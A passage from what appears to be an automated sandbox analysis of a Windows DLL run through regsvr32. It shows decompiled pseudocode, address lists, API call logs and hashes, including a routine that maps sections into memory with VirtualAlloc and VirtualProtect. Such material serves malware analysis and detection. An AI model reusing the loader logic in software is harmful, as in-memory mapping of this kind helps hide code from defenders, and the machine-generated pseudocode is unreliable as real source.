                                                                                                        						_t51 =  *_t33 + _t82 * 8;
                                                                                                        						 *_t51 =  *_t51 | 0x00000001;
                                                                                                        						__eflags =  *_t51;
                                                                                                        						_t37 = _t82 + 1; // 0x4
                                                                                                        						 *(_t86 + 8) = _t37;
                                                                                                        						LeaveCriticalSection(_v4);
                                                                                                        						return _t82;
                                                                                                        					} else {
                                                                                                        						goto L7;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}































                                                                                                        0x10013a9b
                                                                                                        0x10013a9c
                                                                                                        0x10013a9d
                                                                                                        0x10013a9f
                                                                                                        0x10013aa1
                                                                                                        0x10013aa1
                                                                                                        0x10013aa6
                                                                                                        0x10013aaa
                                                                                                        0x10013ab0
                                                                                                        0x10013ab0
                                                                                                        0x10013ab3
                                                                                                        0x10013ab3
                                                                                                        0x10013ab8
                                                                                                        0x10013ac7
                                                                                                        0x10013ac9
                                                                                                        0x10013aca
                                                                                                        0x10013acc
                                                                                                        0x10013ae9
                                                                                                        0x10013ae9
                                                                                                        0x10013ae9
                                                                                                        0x10013aec
                                                                                                        0x10013aec
                                                                                                        0x10013aef
                                                                                                        0x10013af1
                                                                                                        0x10013b0f
                                                                                                        0x10013b12
                                                                                                        0x10013b20
                                                                                                        0x10013b26
                                                                                                        0x10013b29
                                                                                                        0x10013af3
                                                                                                        0x10013af6
                                                                                                        0x10013afc
                                                                                                        0x10013b00
                                                                                                        0x10013b00
                                                                                                        0x10013b2f
                                                                                                        0x10013b31
                                                                                                        0x10013b5e
                                                                                                        0x10013b60
                                                                                                        0x10013b67
                                                                                                        0x10013b71
                                                                                                        0x10013b79
                                                                                                        0x10013b7c
                                                                                                        0x00000000
                                                                                                        0x10013b33
                                                                                                        0x10013b33
                                                                                                        0x10013b33
                                                                                                        0x10013b36
                                                                                                        0x10013b38
                                                                                                        0x10013b42
                                                                                                        0x10013b42
                                                                                                        0x10013b4c
                                                                                                        0x1000a0a7
                                                                                                        0x1000a0a8
                                                                                                        0x1000a0aa
                                                                                                        0x1000a0b4
                                                                                                        0x1000a0bb
                                                                                                        0x1000a0c0
                                                                                                        0x1000a0c1
                                                                                                        0x1000a0c2
                                                                                                        0x1000a0c4
                                                                                                        0x1000a0ce
                                                                                                        0x1000a0d5
                                                                                                        0x1000a0da
                                                                                                        0x1000a0db
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000a123
                                                                                                        0x10013ace
                                                                                                        0x10013ace
                                                                                                        0x10013ad1
                                                                                                        0x10013ad1
                                                                                                        0x10013ad4
                                                                                                        0x10013ad4
                                                                                                        0x10013ad7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013ad9
                                                                                                        0x10013ada
                                                                                                        0x10013add
                                                                                                        0x10013adf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013adf
                                                                                                        0x10013ae1
                                                                                                        0x10013ae3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013ae3
                                                                                                        0x10013aba
                                                                                                        0x10013aba
                                                                                                        0x10013aba
                                                                                                        0x10013abd
                                                                                                        0x10013ac1
                                                                                                        0x10013b7f
                                                                                                        0x10013b7f
                                                                                                        0x10013b7f
                                                                                                        0x10013b82
                                                                                                        0x10013b84
                                                                                                        0x10013b87
                                                                                                        0x10013b87
                                                                                                        0x10013b8a
                                                                                                        0x10013b91
                                                                                                        0x10013b94
                                                                                                        0x10013b94
                                                                                                        0x10013b97
                                                                                                        0x10013b9a
                                                                                                        0x10013b9d
                                                                                                        0x10013baa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013ac1

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
                                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
                                                                                                        • GlobalHandle.KERNEL32(00D74820), ref: 10013B09
                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
                                                                                                        • GlobalReAlloc.KERNEL32 ref: 10013B29
                                                                                                        • GlobalHandle.KERNEL32(00D74820), ref: 10013B3B
                                                                                                        • GlobalLock.KERNEL32 ref: 10013B42
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
                                                                                                        • GlobalLock.KERNEL32 ref: 10013B58
                                                                                                        • _memset.LIBCMT ref: 10013B71
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10013B9D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 496899490-0
                                                                                                        • Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
                                                                                                        • Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
                                                                                                        • Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
                                                                                                        • Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 27%
                                                                                                        			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				intOrPtr* _t10;
                                                                                                        				intOrPtr _t13;
                                                                                                        				intOrPtr _t23;
                                                                                                        				void* _t25;
                                                                                                        
                                                                                                        				_push(0xc);
                                                                                                        				_push(0x1002f780);
                                                                                                        				_t8 = E1001984C(__ebx, __edi, __esi);
                                                                                                        				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                        				if(_t23 == 0) {
                                                                                                        					L9:
                                                                                                        					return E10019891(_t8);
                                                                                                        				}
                                                                                                        				if( *0x1005c984 != 3) {
                                                                                                        					_push(_t23);
                                                                                                        					L7:
                                                                                                        					_push(0);
                                                                                                        					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
                                                                                                        					_t31 = _t8;
                                                                                                        					if(_t8 == 0) {
                                                                                                        						_t10 = E10017D62(_t31);
                                                                                                        						 *_t10 = E10017D27(GetLastError());
                                                                                                        					}
                                                                                                        					goto L9;
                                                                                                        				}
                                                                                                        				E1001A549(4);
                                                                                                        				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                        				_t13 = E1001A5C2(_t23);
                                                                                                        				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                        				if(_t13 != 0) {
                                                                                                        					_push(_t23);
                                                                                                        					_push(_t13);
                                                                                                        					E1001A5ED();
                                                                                                        				}
                                                                                                        				 *(_t25 - 4) = 0xfffffffe;
                                                                                                        				_t8 = E100163D6();
                                                                                                        				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                        					goto L9;
                                                                                                        				} else {
                                                                                                        					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        			}







                                                                                                        0x10016380
                                                                                                        0x10016382
                                                                                                        0x10016387
                                                                                                        0x1001638c
                                                                                                        0x10016391
                                                                                                        0x10016408
                                                                                                        0x1001640d
                                                                                                        0x1001640d
                                                                                                        0x1001639a
                                                                                                        0x100163df
                                                                                                        0x100163e0
                                                                                                        0x100163e0
                                                                                                        0x100163e8
                                                                                                        0x100163ee
                                                                                                        0x100163f0
                                                                                                        0x100163f2
                                                                                                        0x10016405
                                                                                                        0x10016407
                                                                                                        0x00000000
                                                                                                        0x100163f0
                                                                                                        0x1001639e
                                                                                                        0x100163a4
                                                                                                        0x100163a9
                                                                                                        0x100163af
                                                                                                        0x100163b4
                                                                                                        0x100163b6
                                                                                                        0x100163b7
                                                                                                        0x100163b8
                                                                                                        0x100163be
                                                                                                        0x100163bf
                                                                                                        0x100163c6
                                                                                                        0x100163cf
                                                                                                        0x00000000
                                                                                                        0x100163d1
                                                                                                        0x100163d1
                                                                                                        0x00000000
                                                                                                        0x100163d1

                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 1001639E
                                                                                                          • Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
                                                                                                          • Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
                                                                                                          • Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571
                                                                                                        • ___sbh_find_block.LIBCMT ref: 100163A9
                                                                                                        • ___sbh_free_block.LIBCMT ref: 100163B8
                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
                                                                                                        • GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714421763-0
                                                                                                        • Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
                                                                                                        • Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
                                                                                                        • Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
                                                                                                        • Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 161 100021d0-100021e0 162 100021e2-100021e7 161->162 163 100021ec-100021f8 161->163 164 100022ec-100022ef 162->164 165 10002254-100022b6 163->165 166 100021fa-10002205 163->166 169 100022c4-100022e1 VirtualProtect 165->169 170 100022b8-100022c1 165->170 167 10002207-1000220e 166->167 168 1000224a-1000224f 166->168 171 10002210-1000221e 167->171 172 10002232-10002244 VirtualFree 167->172 168->164 173 100022e3-100022e5 169->173 174 100022e7 169->174 170->169 171->172 175 10002220-10002230 171->175 172->168 173->164 174->164 175->168 175->172
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
                                                                                                        				long _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				int _t67;
                                                                                                        
                                                                                                        				_v28 = __ecx;
                                                                                                        				if(_a8[2] != 0) {
                                                                                                        					if((_a8[3] & 0x02000000) == 0) {
                                                                                                        						asm("sbb ecx, ecx");
                                                                                                        						_v16 =  ~( ~(_a8[3] & 0x20000000));
                                                                                                        						asm("sbb eax, eax");
                                                                                                        						_v24 =  ~( ~(_a8[3] & 0x40000000));
                                                                                                        						asm("sbb edx, edx");
                                                                                                        						_v12 =  ~( ~(_a8[3] & 0x80000000));
                                                                                                        						_t39 = _v24 * 8; // 0x10056f20
                                                                                                        						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
                                                                                                        						if((_a8[3] & 0x04000000) != 0) {
                                                                                                        							_v20 = _v20 | 0x00000200;
                                                                                                        						}
                                                                                                        						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
                                                                                                        						if(_t67 != 0) {
                                                                                                        							return 1;
                                                                                                        						} else {
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
                                                                                                        						VirtualFree( *_a8, _a8[2], 0x4000); // executed
                                                                                                        					}
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        				return 1;
                                                                                                        			}










                                                                                                        0x100021d6
                                                                                                        0x100021e0
                                                                                                        0x100021f8
                                                                                                        0x10002262
                                                                                                        0x10002266
                                                                                                        0x10002276
                                                                                                        0x1000227a
                                                                                                        0x1000228b
                                                                                                        0x1000228f
                                                                                                        0x1000229b
                                                                                                        0x100022a8
                                                                                                        0x100022b6
                                                                                                        0x100022c1
                                                                                                        0x100022c1
                                                                                                        0x100022d9
                                                                                                        0x100022e1
                                                                                                        0x00000000
                                                                                                        0x100022e3
                                                                                                        0x00000000
                                                                                                        0x100022e3
                                                                                                        0x100022e1
                                                                                                        0x10002205
                                                                                                        0x10002244
                                                                                                        0x10002244
                                                                                                        0x00000000
                                                                                                        0x1000224a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
                                                                                                        • Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
                                                                                                        • Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
                                                                                                        • Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 176 1001a305-1001a323 HeapCreate 177 1001a325-1001a327 176->177 178 1001a328-1001a335 call 1001a2aa 176->178 181 1001a337-1001a344 call 1001a57a 178->181 182 1001a35b-1001a35e 178->182 181->182 185 1001a346-1001a359 HeapDestroy 181->185 185->177
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001A305(intOrPtr _a4) {
                                                                                                        				void* _t6;
                                                                                                        				intOrPtr _t7;
                                                                                                        				void* _t10;
                                                                                                        
                                                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                        				 *0x1005ad4c = _t6;
                                                                                                        				if(_t6 != 0) {
                                                                                                        					_t7 = E1001A2AA(__eflags);
                                                                                                        					__eflags = _t7 - 3;
                                                                                                        					 *0x1005c984 = _t7;
                                                                                                        					if(_t7 != 3) {
                                                                                                        						L5:
                                                                                                        						__eflags = 1;
                                                                                                        						return 1;
                                                                                                        					} else {
                                                                                                        						_t10 = E1001A57A(0x3f8);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 != 0) {
                                                                                                        							goto L5;
                                                                                                        						} else {
                                                                                                        							HeapDestroy( *0x1005ad4c);
                                                                                                        							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}






                                                                                                        0x1001a316
                                                                                                        0x1001a31e
                                                                                                        0x1001a323
                                                                                                        0x1001a328
                                                                                                        0x1001a32d
                                                                                                        0x1001a330
                                                                                                        0x1001a335
                                                                                                        0x1001a35b
                                                                                                        0x1001a35d
                                                                                                        0x1001a35e
                                                                                                        0x1001a337
                                                                                                        0x1001a33c
                                                                                                        0x1001a341
                                                                                                        0x1001a344
                                                                                                        0x00000000
                                                                                                        0x1001a346
                                                                                                        0x1001a34c
                                                                                                        0x1001a352
                                                                                                        0x00000000
                                                                                                        0x1001a352
                                                                                                        0x1001a344
                                                                                                        0x1001a325
                                                                                                        0x1001a325
                                                                                                        0x1001a327
                                                                                                        0x1001a327

                                                                                                        APIs
                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
                                                                                                        • HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$CreateDestroy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3296620671-0
                                                                                                        • Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
                                                                                                        • Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
                                                                                                        • Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
                                                                                                        • Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 186 10002010-1000203e 187 10002052-1000205e 186->187 188 10002064-1000206b 187->188 189 10002156 187->189 190 100020d3-100020ee call 10001fe0 188->190 191 1000206d-1000207a 188->191 192 1000215b-1000215e 189->192 200 100020f0-100020f2 190->200 201 100020f4-10002119 VirtualAlloc 190->201 194 1000207c-1000209e VirtualAlloc 191->194 195 100020ce 191->195 197 100020a0-100020a2 194->197 198 100020a7-100020cb call 10001e10 194->198 195->187 197->192 198->195 200->192 203 1000211b-1000211d 201->203 204 1000211f-1000214e call 10001e60 201->204 203->192 204->189
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				void* _v12;
                                                                                                        				long _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t76;
                                                                                                        				void* _t127;
                                                                                                        
                                                                                                        				_v28 = __ecx;
                                                                                                        				_t3 = _a16 + 4; // 0x104e9
                                                                                                        				_v20 =  *_t3;
                                                                                                        				_t7 =  *_a16 + 0x14; // 0x4a8bb445
                                                                                                        				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
                                                                                                        				_v24 =  *_a16 + _t9;
                                                                                                        				_v8 = 0;
                                                                                                        				while(1) {
                                                                                                        					_t17 =  *_a16 + 6; // 0xe9000001
                                                                                                        					if(_v8 >= ( *_t17 & 0x0000ffff)) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					if( *(_v24 + 0x10) != 0) {
                                                                                                        						_t41 = _v24 + 0x14; // 0x4a8bb445
                                                                                                        						_t43 = _v24 + 0x10; // 0x8b118bbc
                                                                                                        						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
                                                                                                        							_t47 = _v24 + 0x10; // 0x8b118bbc
                                                                                                        							_t50 = _v24 + 0xc; // 0x4d8b0000
                                                                                                        							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
                                                                                                        							_v12 = _t76;
                                                                                                        							if(_v12 != 0) {
                                                                                                        								_t55 = _v24 + 0xc; // 0x4d8b0000
                                                                                                        								_v12 = _v20 +  *_t55;
                                                                                                        								_t58 = _v24 + 0x10; // 0x8b118bbc
                                                                                                        								_t61 = _v24 + 0x14; // 0x4a8bb445
                                                                                                        								E10001E60(_v12, _a4 +  *_t61,  *_t58);
                                                                                                        								_t127 = _t127 + 0xc;
                                                                                                        								 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                        								L1:
                                                                                                        								_v8 = _v8 + 1;
                                                                                                        								_v24 = _v24 + 0x28;
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        					_v16 =  *((intOrPtr*)(_a12 + 0x38));
                                                                                                        					if(_v16 <= 0) {
                                                                                                        						L8:
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					_t28 = _v24 + 0xc; // 0x4d8b0000
                                                                                                        					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
                                                                                                        					if(_v12 != 0) {
                                                                                                        						_t33 = _v24 + 0xc; // 0x4d8b0000
                                                                                                        						_v12 = _v20 +  *_t33;
                                                                                                        						 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                        						E10001E10(_v12, 0, _v16);
                                                                                                        						_t127 = _t127 + 0xc;
                                                                                                        						goto L8;
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				return 1;
                                                                                                        			}











                                                                                                        0x10002016
                                                                                                        0x1000201c
                                                                                                        0x1000201f
                                                                                                        0x1000202c
                                                                                                        0x10002030
                                                                                                        0x10002034
                                                                                                        0x10002037
                                                                                                        0x10002052
                                                                                                        0x10002057
                                                                                                        0x1000205e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000206b
                                                                                                        0x100020d6
                                                                                                        0x100020dc
                                                                                                        0x100020ee
                                                                                                        0x100020fe
                                                                                                        0x10002108
                                                                                                        0x1000210c
                                                                                                        0x10002112
                                                                                                        0x10002119
                                                                                                        0x10002125
                                                                                                        0x10002128
                                                                                                        0x1000212e
                                                                                                        0x10002138
                                                                                                        0x10002140
                                                                                                        0x10002145
                                                                                                        0x1000214e
                                                                                                        0x10002040
                                                                                                        0x10002046
                                                                                                        0x1000204f
                                                                                                        0x00000000
                                                                                                        0x1000204f
                                                                                                        0x00000000
                                                                                                        0x1000211b
                                                                                                        0x00000000
                                                                                                        0x100020f0
                                                                                                        0x10002073
                                                                                                        0x1000207a
                                                                                                        0x100020ce
                                                                                                        0x00000000
                                                                                                        0x100020ce
                                                                                                        0x1000208d
                                                                                                        0x10002097
                                                                                                        0x1000209e
                                                                                                        0x100020ad
                                                                                                        0x100020b0
                                                                                                        0x100020b9
                                                                                                        0x100020c6
                                                                                                        0x100020cb
                                                                                                        0x00000000
                                                                                                        0x100020cb
                                                                                                        0x00000000
                                                                                                        0x100020a0
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
                                                                                                        • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
                                                                                                        • Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
                                                                                                        • Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
                                                                                                        • Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 208 10008860-1000887a call 1001703b 211 10008883-10008897 208->211 212 1000887c-10008881 208->212 214 100088ab-100088b2 211->214 213 100088db-100088de 212->213 215 100088b4-100088bc 214->215 216 100088be-100088c2 call 10016380 214->216 215->214 219 100088c7-100088d0 216->219 220 100088d2-100088d4 219->220 221 100088d6 219->221 220->213 221->213
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10008860(void* __eflags) {
                                                                                                        				char* _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				char _v16;
                                                                                                        				char* _v20;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t25;
                                                                                                        				void* _t29;
                                                                                                        				intOrPtr _t32;
                                                                                                        				void* _t33;
                                                                                                        				void* _t34;
                                                                                                        
                                                                                                        				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
                                                                                                        				if(_v8 != 0) {
